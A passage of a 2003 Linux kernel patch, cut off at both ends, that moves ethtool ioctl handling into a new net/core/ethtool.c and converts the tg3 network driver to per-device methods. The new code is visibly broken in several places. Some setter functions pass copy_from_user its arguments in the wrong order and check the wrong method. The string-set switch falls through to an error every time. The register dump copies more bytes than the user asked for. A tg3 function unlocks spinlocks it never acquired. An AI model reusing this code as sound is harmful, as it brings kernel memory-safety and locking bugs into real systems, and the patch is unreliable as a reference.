rtnetlink.o utils.o link_watch.o filter.o obj-$(CONFIG_NETFILTER) += netfilter.o obj-$(CONFIG_NET_DIVERT) += dv.o Index: net/core/dev.c =================================================================== RCS file: /var/cvs/linux-2.5/net/core/dev.c,v retrieving revision 1.22 diff -u -p -r1.22 dev.c --- net/core/dev.c 2 Jul 2003 22:08:58 -0000 1.22 +++ net/core/dev.c 8 Jul 2003 15:36:35 -0000 @@ -2224,6 +2224,36 @@ int dev_set_mtu(struct net_device *dev, return err; } +/* These are all netdev_op methods in case a driver needs to do something + * different. If we find that all drivers want to do the same thing here, + * we can turn them into dev_() function calls. + */ + +u32 netdev_op_get_link(struct net_device *dev) +{ + return netif_carrier_ok(dev) ? 1 : 0; +} + +u32 netdev_op_get_tx_csum(struct net_device *dev) +{ + return (dev->features & NETIF_F_IP_CSUM) != 0; +} + +u32 netdev_op_get_sg(struct net_device *dev) +{ + return (dev->features & NETIF_F_SG) != 0; +} + +int netdev_op_set_sg(struct net_device *dev, u32 data) +{ + if (data) + dev->features |= NETIF_F_SG; + else + dev->features &= ~NETIF_F_SG; + + return 0; +} + /* * Perform the SIOCxIFxxx calls. @@ -2364,7 +2394,6 @@ static int dev_ifsioc(struct ifreq *ifr, cmd == SIOCBONDSLAVEINFOQUERY || cmd == SIOCBONDINFOQUERY || cmd == SIOCBONDCHANGEACTIVE || - cmd == SIOCETHTOOL || cmd == SIOCGMIIPHY || cmd == SIOCGMIIREG || cmd == SIOCSMIIREG || @@ -2461,13 +2490,26 @@ int dev_ioctl(unsigned int cmd, void *ar } return ret; + case SIOCETHTOOL: + dev_load(ifr.ifr_name); + rtnl_lock(); + ret = dev_ethtool(&ifr); + rtnl_unlock(); + if (!ret) { + if (colon) + *colon = ':'; + if (copy_to_user(arg, &ifr, + sizeof(struct ifreq))) + ret = -EFAULT; + } + return ret; + /* * These ioctl calls: * - require superuser power. * - require strict serialization. * - return a value */ - case SIOCETHTOOL: case SIOCGMIIPHY: case SIOCGMIIREG: if (!capable(CAP_NET_ADMIN)) Index: net/core/ethtool.c =================================================================== RCS file: net/core/ethtool.c diff -N net/core/ethtool.c --- /dev/null 1 Jan 1970 00:00:00 -0000 +++ net/core/ethtool.c 9 Jul 2003 16:04:26 -0000 @@ -0,0 +1,585 @@ +/* + * net/core/ethtool.c - Ethtool ioctl handler + * Split from net/core/dev.c by Matthew Wilcox + * The only entry point in this file is dev_ethtool() and its only caller + * is from net/core/dev.c + * + * It's GPL, stupid. + */ + +#include +#include +#include + +static int ethtool_get_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd = { ETHTOOL_GSET }; + int err; + + if (!dev->netdev_ops->get_settings) + return -EOPNOTSUPP; + + err = dev->netdev_ops->get_settings(dev, &cmd); + if (err < 0) + return err; + + if (copy_to_user(useraddr, &cmd, sizeof(cmd))) + return -EFAULT; + return 0; +} + +static int ethtool_set_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd; + + if (!dev->netdev_ops->set_settings) + return -EOPNOTSUPP; + + if (copy_from_user(&cmd, useraddr, sizeof(cmd))) + return -EFAULT; + + return dev->netdev_ops->set_settings(dev, &cmd); +} + +static int ethtool_get_drvinfo(struct net_device *dev, void *useraddr) +{ + struct ethtool_drvinfo info; + struct netdev_ops *ops = dev->netdev_ops; + + if (!ops->get_drvinfo) + return -EOPNOTSUPP; + + memset(&info, 0, sizeof(info)); + info.cmd = ETHTOOL_GDRVINFO; + ops->get_drvinfo(dev, &info); + + if (ops->self_test_count) + info.testinfo_len = ops->self_test_count(dev); + if (ops->get_stats_count) + info.n_stats = ops->get_stats_count(dev); + if (ops->get_regs_len) + info.regdump_len = ops->get_regs_len(dev); + + if (copy_to_user(useraddr, &info, sizeof(info))) + return -EFAULT; + return 0; +} + +static int ethtool_get_regs(struct net_device *dev, char *useraddr) +{ + struct ethtool_regs regs; + struct netdev_ops *ops = dev->netdev_ops; + void *regbuf; + int reglen, ret; + + if (!ops->get_regs || !ops->get_regs_len) + return -EOPNOTSUPP; + + if (copy_from_user(®s, useraddr, sizeof(regs))) + return -EFAULT; + + reglen = ops->get_regs_len(dev); + if (regs.len > reglen) + regs.len = reglen; + + regbuf = kmalloc(reglen, GFP_KERNEL); + if (!regbuf) + return -ENOMEM; + + ops->get_regs(dev, ®s, regbuf); + + ret = -EFAULT; + if (copy_to_user(useraddr, ®s, sizeof(regs))) + goto out; + useraddr += offsetof(struct ethtool_regs, data); + if (copy_to_user(useraddr, regbuf, reglen)) + goto out; + ret = 0; + + out: + kfree(regbuf); + return ret; +} + +static int ethtool_get_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; + + if (!dev->netdev_ops->get_wol) + return -EOPNOTSUPP; + + dev->netdev_ops->get_wol(dev, &wol); + + if (copy_to_user(useraddr, &wol, sizeof(wol))) + return -EFAULT; + return 0; +} + +static int ethtool_set_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol; + + if (!dev->netdev_ops->set_wol) + return -EOPNOTSUPP; + + if (copy_from_user(&wol, useraddr, sizeof(wol))) + return -EFAULT; + + return dev->netdev_ops->set_wol(dev, &wol); +} + +static int ethtool_get_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GMSGLVL }; + + if (!dev->netdev_ops->get_msglevel) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_msglevel(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_msglevel) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_msglevel(dev, edata.data); + return 0; +} + +static int ethtool_nway_reset(struct net_device *dev) +{ + if (!dev->netdev_ops->nway_reset) + return -EOPNOTSUPP; + + return dev->netdev_ops->nway_reset(dev); +} + +static int ethtool_get_link(struct net_device *dev, void *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GLINK }; + + if (!dev->netdev_ops->get_link) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_link(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_get_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom = { ETHTOOL_GEEPROM }; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + dev->netdev_ops->get_eeprom(dev, &eeprom); + + if (copy_to_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + return 0; +} + +static int ethtool_set_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + + return dev->netdev_ops->set_eeprom(dev, &eeprom); +} + +static int ethtool_get_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce = { ETHTOOL_GCOALESCE }; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + dev->netdev_ops->get_coalesce(dev, &coalesce); + + if (copy_to_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + return 0; +} + +static int ethtool_set_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + + return dev->netdev_ops->set_coalesce(dev, &coalesce); +} + +static int ethtool_get_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam = { ETHTOOL_GRINGPARAM }; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_ringparam(dev, &ringparam); + + if (copy_to_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; + + return dev->netdev_ops->set_ringparam(dev, &ringparam); +} + +static int ethtool_get_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam = { ETHTOOL_GPAUSEPARAM }; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_pauseparam(dev, &pauseparam); + + if (copy_to_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + if (copy_from_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + + return dev->netdev_ops->set_pauseparam(dev, &pauseparam); +} + +static int ethtool_get_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + + if (!dev->netdev_ops->get_rx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_rx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_rx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_rx_csum(dev, edata.data); + return 0; +} + +static int ethtool_get_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GTXCSUM }; + + if (!dev->netdev_ops->get_tx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_tx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_tx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_tx_csum(dev, edata.data); +} + +static int ethtool_get_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GSG }; + + if (!dev->netdev_ops->get_sg) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_sg(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_sg) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_sg(dev, edata.data); +} + +static int ethtool_self_test(struct net_device *dev, char *useraddr) +{ + struct ethtool_test test; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->self_test || !ops->self_test_count) + return -EOPNOTSUPP; + + if (copy_from_user(&test, useraddr, sizeof(test))) + return -EFAULT; + + test.len = ops->self_test_count(dev); + data = kmalloc(test.len * sizeof(u64), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->self_test(dev, &test, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &test, sizeof(test))) + goto out; + useraddr += sizeof(test); + if (copy_to_user(useraddr, data, test.len * sizeof(u64))) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +static int ethtool_get_strings(struct net_device *dev, void *useraddr) +{ + struct ethtool_gstrings gstrings; + struct netdev_ops *ops = dev->netdev_ops; + u8 *data; + int ret; + + if (!ops->get_strings) + return -EOPNOTSUPP; + + if (copy_from_user(&gstrings, useraddr, sizeof(gstrings))) + return -EFAULT; + + switch (gstrings.string_set) { + case ETH_SS_TEST: + if (ops->self_test_count) + gstrings.len = ops->self_test_count(dev); + else + return -EOPNOTSUPP; + case ETH_SS_STATS: + if (ops->get_stats_count) + gstrings.len = ops->get_stats_count(dev); + else + return -EOPNOTSUPP; + default: + return -EINVAL; + } + + data = kmalloc(gstrings.len * ETH_GSTRING_LEN, GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_strings(dev, gstrings.string_set, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &gstrings, sizeof(gstrings))) + goto out; + useraddr += sizeof(gstrings); + if (copy_to_user(useraddr, data, gstrings.len * ETH_GSTRING_LEN)) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +static int ethtool_phys_id(struct net_device *dev, void *useraddr) +{ + struct ethtool_value id; + + if (!dev->netdev_ops->phys_id) + return -EOPNOTSUPP; + + if (copy_from_user(&id, useraddr, sizeof(id))) + return -EFAULT; + + dev->netdev_ops->phys_id(dev, id.data); + return 0; +} + +static int ethtool_get_stats(struct net_device *dev, void *useraddr) +{ + struct ethtool_stats stats; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->get_stats || !ops->get_stats_count) + return -EOPNOTSUPP; + + if (copy_from_user(&stats, useraddr, sizeof(stats))) + return -EFAULT; + + stats.n_stats = ops->get_stats_count(dev); + data = kmalloc(stats.n_stats * sizeof(u64), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_stats(dev, &stats, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &stats, sizeof(stats))) + goto out; + useraddr += sizeof(stats); + if (copy_to_user(useraddr, data, stats.n_stats * sizeof(u64))) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +int dev_ethtool(struct ifreq *ifr) +{ + struct net_device *dev = __dev_get_by_name(ifr->ifr_name); + void *useraddr = (void *) ifr->ifr_data; + u32 ethcmd; + + /* XXX: We can make this more finegrained now. Keep existing + * behaviour for the moment. + */ + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + + if (!dev || !netif_device_present(dev)) + return -ENODEV; + + if (!dev->netdev_ops) + goto ioctl; + + if (copy_from_user (ðcmd, useraddr, sizeof (ethcmd))) + return -EFAULT; + + switch (ethcmd) { + case ETHTOOL_GSET: + return ethtool_get_settings(dev, useraddr); + case ETHTOOL_SSET: + return ethtool_set_settings(dev, useraddr); + case ETHTOOL_GDRVINFO: + return ethtool_get_drvinfo(dev, useraddr); + case ETHTOOL_GREGS: + return ethtool_get_regs(dev, useraddr); + case ETHTOOL_GWOL: + return ethtool_get_wol(dev, useraddr); + case ETHTOOL_SWOL: + return ethtool_set_wol(dev, useraddr); + case ETHTOOL_GMSGLVL: + return ethtool_get_msglevel(dev, useraddr); + case ETHTOOL_SMSGLVL: + return ethtool_set_msglevel(dev, useraddr); + case ETHTOOL_NWAY_RST: + return ethtool_nway_reset(dev); + case ETHTOOL_GLINK: + return ethtool_get_link(dev, useraddr); + case ETHTOOL_GEEPROM: + return ethtool_get_eeprom(dev, useraddr); + case ETHTOOL_SEEPROM: + return ethtool_set_eeprom(dev, useraddr); + case ETHTOOL_GCOALESCE: + return ethtool_get_coalesce(dev, useraddr); + case ETHTOOL_SCOALESCE: + return ethtool_set_coalesce(dev, useraddr); + case ETHTOOL_GRINGPARAM: + return ethtool_get_ringparam(dev, useraddr); + case ETHTOOL_SRINGPARAM: + return ethtool_set_ringparam(dev, useraddr); + case ETHTOOL_GPAUSEPARAM: + return ethtool_get_pauseparam(dev, useraddr); + case ETHTOOL_SPAUSEPARAM: + return ethtool_set_pauseparam(dev, useraddr); + case ETHTOOL_GRXCSUM: + return ethtool_get_rx_csum(dev, useraddr); + case ETHTOOL_SRXCSUM: + return ethtool_set_rx_csum(dev, useraddr); + case ETHTOOL_GTXCSUM: + return ethtool_get_tx_csum(dev, useraddr); + case ETHTOOL_STXCSUM: + return ethtool_set_tx_csum(dev, useraddr); + case ETHTOOL_GSG: + return ethtool_get_sg(dev, useraddr); + case ETHTOOL_SSG: + return ethtool_set_sg(dev, useraddr); + case ETHTOOL_TEST: + return ethtool_self_test(dev, useraddr); + case ETHTOOL_GSTRINGS: + return ethtool_get_strings(dev, useraddr); + case ETHTOOL_PHYS_ID: + return ethtool_phys_id(dev, useraddr); + case ETHTOOL_GSTATS: + return ethtool_get_stats(dev, useraddr); + default: + return -EOPNOTSUPP; + } + + ioctl: + if (dev->do_ioctl) + return dev->do_ioctl(dev, ifr, SIOCETHTOOL); + return -EOPNOTSUPP; +} + Index: drivers/net/tg3.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/tg3.c,v retrieving revision 1.16 diff -u -p -r1.16 tg3.c --- drivers/net/tg3.c 14 Jun 2003 22:15:21 -0000 1.16 +++ drivers/net/tg3.c 9 Jul 2003 14:33:19 -0000 @@ -5036,16 +5036,20 @@ static void tg3_set_rx_mode(struct net_d #define TG3_REGDUMP_LEN (32 * 1024) -static u8 *tg3_get_regs(struct tg3 *tp) +static int tg3_get_regs_len(struct net_device *dev) { - u8 *orig_p = kmalloc(TG3_REGDUMP_LEN, GFP_KERNEL); - u8 *p; + return TG3_REGDUMP_LEN; +} + +static void tg3_get_regs(struct net_device *dev, struct ethtool_regs *regs, void *p) +{ + struct tg3 *tp = dev->priv; + u8 *orig_p = p; int i; - if (orig_p == NULL) - return NULL; + regs->version = 0; - memset(orig_p, 0, TG3_REGDUMP_LEN); + memset(p, 0, TG3_REGDUMP_LEN); spin_lock_irq(&tp->lock); spin_lock(&tp->tx_lock); @@ -5099,390 +5103,287 @@ do { p = orig_p + (reg); \ spin_unlock(&tp->tx_lock); spin_unlock_irq(&tp->lock); - - return orig_p; } -static int tg3_ethtool_ioctl (struct net_device *dev, void *useraddr) +static int tg3_get_settings(struct net_device *dev, struct ethtool_cmd *cmd) { struct tg3 *tp = dev->priv; - struct pci_dev *pci_dev = tp->pdev; - u32 ethcmd; - if (copy_from_user (ðcmd, useraddr, sizeof (ethcmd))) - return -EFAULT; - - switch (ethcmd) { - case ETHTOOL_GDRVINFO:{ - struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; - strcpy (info.driver, DRV_MODULE_NAME); - strcpy (info.version, DRV_MODULE_VERSION); - memset(&info.fw_version, 0, sizeof(info.fw_version)); - strcpy (info.bus_info, pci_dev->slot_name); - info.eedump_len = 0; - info.regdump_len = TG3_REGDUMP_LEN; - if (copy_to_user (useraddr, &info, sizeof (info))) - return -EFAULT; - return 0; - } + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + cmd->supported = (SUPPORTED_Autoneg); + + if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) + cmd->supported |= (SUPPORTED_1000baseT_Half | + SUPPORTED_1000baseT_Full); + + if (tp->phy_id != PHY_ID_SERDES) + cmd->supported |= (SUPPORTED_100baseT_Half | + SUPPORTED_100baseT_Full | + SUPPORTED_10baseT_Half | + SUPPORTED_10baseT_Full | + SUPPORTED_MII); + else + cmd->supported |= SUPPORTED_FIBRE; - case ETHTOOL_GSET: { - struct ethtool_cmd cmd = { ETHTOOL_GSET }; + cmd->advertising = tp->link_config.advertising; + cmd->speed = tp->link_config.active_speed; + cmd->duplex = tp->link_config.active_duplex; + cmd->port = 0; + cmd->phy_address = PHY_ADDR; + cmd->transceiver = 0; + cmd->autoneg = tp->link_config.autoneg; + cmd->maxtxpkt = 0; + cmd->maxrxpkt = 0; + return 0; +} - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - cmd.supported = (SUPPORTED_Autoneg); - - if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) - cmd.supported |= (SUPPORTED_1000baseT_Half | - SUPPORTED_1000baseT_Full); - - if (tp->phy_id != PHY_ID_SERDES) - cmd.supported |= (SUPPORTED_100baseT_Half | - SUPPORTED_100baseT_Full | - SUPPORTED_10baseT_Half | - SUPPORTED_10baseT_Full | - SUPPORTED_MII); - else - cmd.supported |= SUPPORTED_FIBRE; +static int tg3_set_settings(struct net_device *dev, struct ethtool_cmd *cmd) +{ + struct tg3 *tp = dev->priv; - cmd.advertising = tp->link_config.advertising; - cmd.speed = tp->link_config.active_speed; - cmd.duplex = tp->link_config.active_duplex; - cmd.port = 0; - cmd.phy_address = PHY_ADDR; - cmd.transceiver = 0; - cmd.autoneg = tp->link_config.autoneg; - cmd.maxtxpkt = 0; - cmd.maxrxpkt = 0; - if (copy_to_user(useraddr, &cmd, sizeof(cmd))) - return -EFAULT; - return 0; + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + if (cmd->autoneg == AUTONEG_ENABLE) { + tp->link_config.advertising = cmd->advertising; + tp->link_config.speed = SPEED_INVALID; + tp->link_config.duplex = DUPLEX_INVALID; + } else { + tp->link_config.speed = cmd->speed; + tp->link_config.duplex = cmd->duplex; } - case ETHTOOL_SSET: { - struct ethtool_cmd cmd; - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - /* Fiber PHY only supports 1000 full/half */ - if (cmd.autoneg == AUTONEG_ENABLE) { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.advertising & - (ADVERTISED_10baseT_Half | - ADVERTISED_10baseT_Full | - ADVERTISED_100baseT_Half | - ADVERTISED_100baseT_Full))) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.advertising & - (ADVERTISED_1000baseT_Half | - ADVERTISED_1000baseT_Full))) - return -EINVAL; - } else { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - } - - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - - tp->link_config.autoneg = cmd.autoneg; - if (cmd.autoneg == AUTONEG_ENABLE) { - tp->link_config.advertising = cmd.advertising; - tp->link_config.speed = SPEED_INVALID; - tp->link_config.duplex = DUPLEX_INVALID; - } else { - tp->link_config.speed = cmd.speed; - tp->link_config.duplex = cmd.duplex; - } + tg3_setup_phy(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); - tg3_setup_phy(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); + return 0; +} - return 0; - } +static void tg3_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) +{ + struct tg3 *tp = dev->priv; - case ETHTOOL_GREGS: { - struct ethtool_regs regs; - u8 *regbuf; - int ret; - - if (copy_from_user(®s, useraddr, sizeof(regs))) - return -EFAULT; - if (regs.len > TG3_REGDUMP_LEN) - regs.len = TG3_REGDUMP_LEN; - regs.version = 0; - if (copy_to_user(useraddr, ®s, sizeof(regs))) - return -EFAULT; - - regbuf = tg3_get_regs(tp); - if (!regbuf) - return -ENOMEM; - - useraddr += offsetof(struct ethtool_regs, data); - ret = 0; - if (copy_to_user(useraddr, regbuf, regs.len)) - ret = -EFAULT; - kfree(regbuf); - return ret; - } - case ETHTOOL_GWOL: { - struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; - - wol.supported = WAKE_MAGIC; - wol.wolopts = 0; - if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) - wol.wolopts = WAKE_MAGIC; - memset(&wol.sopass, 0, sizeof(wol.sopass)); - if (copy_to_user(useraddr, &wol, sizeof(wol))) - return -EFAULT; - return 0; - } - case ETHTOOL_SWOL: { - struct ethtool_wolinfo wol; + strcpy(info->driver, DRV_MODULE_NAME); + strcpy(info->version, DRV_MODULE_VERSION); + strcpy(info->bus_info, pci_name(tp->pdev)); +} - if (copy_from_user(&wol, useraddr, sizeof(wol))) - return -EFAULT; - if (wol.wolopts & ~WAKE_MAGIC) - return -EINVAL; - if ((wol.wolopts & WAKE_MAGIC) && - tp->phy_id == PHY_ID_SERDES && - !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) - return -EINVAL; +static void tg3_get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (wol.wolopts & WAKE_MAGIC) - tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; - else - tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; - spin_unlock_irq(&tp->lock); + wol->supported = WAKE_MAGIC; + wol->wolopts = 0; + if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) + wol->wolopts = WAKE_MAGIC; + memset(&wol->sopass, 0, sizeof(wol->sopass)); +} - return 0; - } - case ETHTOOL_GMSGLVL: { - struct ethtool_value edata = { ETHTOOL_GMSGLVL }; - edata.data = tp->msg_enable; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SMSGLVL: { - struct ethtool_value edata; - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; - tp->msg_enable = edata.data; - return 0; - } - case ETHTOOL_NWAY_RST: { - u32 bmcr; - int r; +static int tg3_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - tg3_readphy(tp, MII_BMCR, &bmcr); - tg3_readphy(tp, MII_BMCR, &bmcr); - r = -EINVAL; - if (bmcr & BMCR_ANENABLE) { - tg3_writephy(tp, MII_BMCR, - bmcr | BMCR_ANRESTART); - r = 0; - } - spin_unlock_irq(&tp->lock); + if (wol->wolopts & ~WAKE_MAGIC) + return -EINVAL; + if ((wol->wolopts & WAKE_MAGIC) && + tp->phy_id == PHY_ID_SERDES && + !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) + return -EINVAL; - return r; - } - case ETHTOOL_GLINK: { - struct ethtool_value edata = { ETHTOOL_GLINK }; - edata.data = netif_carrier_ok(tp->dev) ? 1 : 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_GRINGPARAM: { - struct ethtool_ringparam ering = { ETHTOOL_GRINGPARAM }; + spin_lock_irq(&tp->lock); + if (wol->wolopts & WAKE_MAGIC) + tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; + else + tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; + spin_unlock_irq(&tp->lock); - ering.rx_max_pending = TG3_RX_RING_SIZE - 1; - ering.rx_mini_max_pending = 0; - ering.rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; - - ering.rx_pending = tp->rx_pending; - ering.rx_mini_pending = 0; - ering.rx_jumbo_pending = tp->rx_jumbo_pending; - ering.tx_pending = tp->tx_pending; + return 0; +} - if (copy_to_user(useraddr, &ering, sizeof(ering))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRINGPARAM: { - struct ethtool_ringparam ering; +static u32 tg3_get_msglevel(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return tp->msg_enable; +} - if (copy_from_user(&ering, useraddr, sizeof(ering))) - return -EFAULT; +static void tg3_set_msglevel(struct net_device *dev, u32 value) +{ + struct tg3 *tp = dev->priv; + tp->msg_enable = value; +} - if ((ering.rx_pending > TG3_RX_RING_SIZE - 1) || - (ering.rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || - (ering.tx_pending > TG3_TX_RING_SIZE - 1)) - return -EINVAL; +static int tg3_nway_reset(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + u32 bmcr; + int r; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); + spin_lock_irq(&tp->lock); + tg3_readphy(tp, MII_BMCR, &bmcr); + tg3_readphy(tp, MII_BMCR, &bmcr); + r = -EINVAL; + if (bmcr & BMCR_ANENABLE) { + tg3_writephy(tp, MII_BMCR, bmcr | BMCR_ANRESTART); + r = 0; + } + spin_unlock_irq(&tp->lock); - tp->rx_pending = ering.rx_pending; - tp->rx_jumbo_pending = ering.rx_jumbo_pending; - tp->tx_pending = ering.tx_pending; - - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - netif_wake_queue(tp->dev); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + return r; +} - return 0; - } - case ETHTOOL_GPAUSEPARAM: { - struct ethtool_pauseparam epause = { ETHTOOL_GPAUSEPARAM }; +static void tg3_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - epause.autoneg = - (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; - epause.rx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; - epause.tx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; - if (copy_to_user(useraddr, &epause, sizeof(epause))) - return -EFAULT; - return 0; - } - case ETHTOOL_SPAUSEPARAM: { - struct ethtool_pauseparam epause; + ering->rx_max_pending = TG3_RX_RING_SIZE - 1; + ering->rx_mini_max_pending = 0; + ering->rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; + + ering->rx_pending = tp->rx_pending; + ering->rx_mini_pending = 0; + ering->rx_jumbo_pending = tp->rx_jumbo_pending; + ering->tx_pending = tp->tx_pending; +} - if (copy_from_user(&epause, useraddr, sizeof(epause))) - return -EFAULT; +static int 